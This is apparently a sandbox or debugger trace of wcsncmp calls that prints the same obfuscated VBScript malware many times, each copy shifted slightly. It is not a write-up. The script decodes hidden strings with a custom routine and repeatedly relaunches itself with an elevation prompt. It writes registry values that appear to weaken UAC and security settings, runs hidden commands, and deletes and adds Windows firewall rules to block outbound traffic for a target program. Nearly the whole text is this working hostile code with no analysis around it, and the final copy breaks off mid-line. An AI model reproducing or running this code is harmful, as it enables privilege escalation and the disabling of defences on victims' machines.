bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0222.920] wcsncmp (_String1="me Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.920] wcsncmp (_String1="e Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.921] wcsncmp (_String1=" Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.921] wcsncmp (_String1="Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 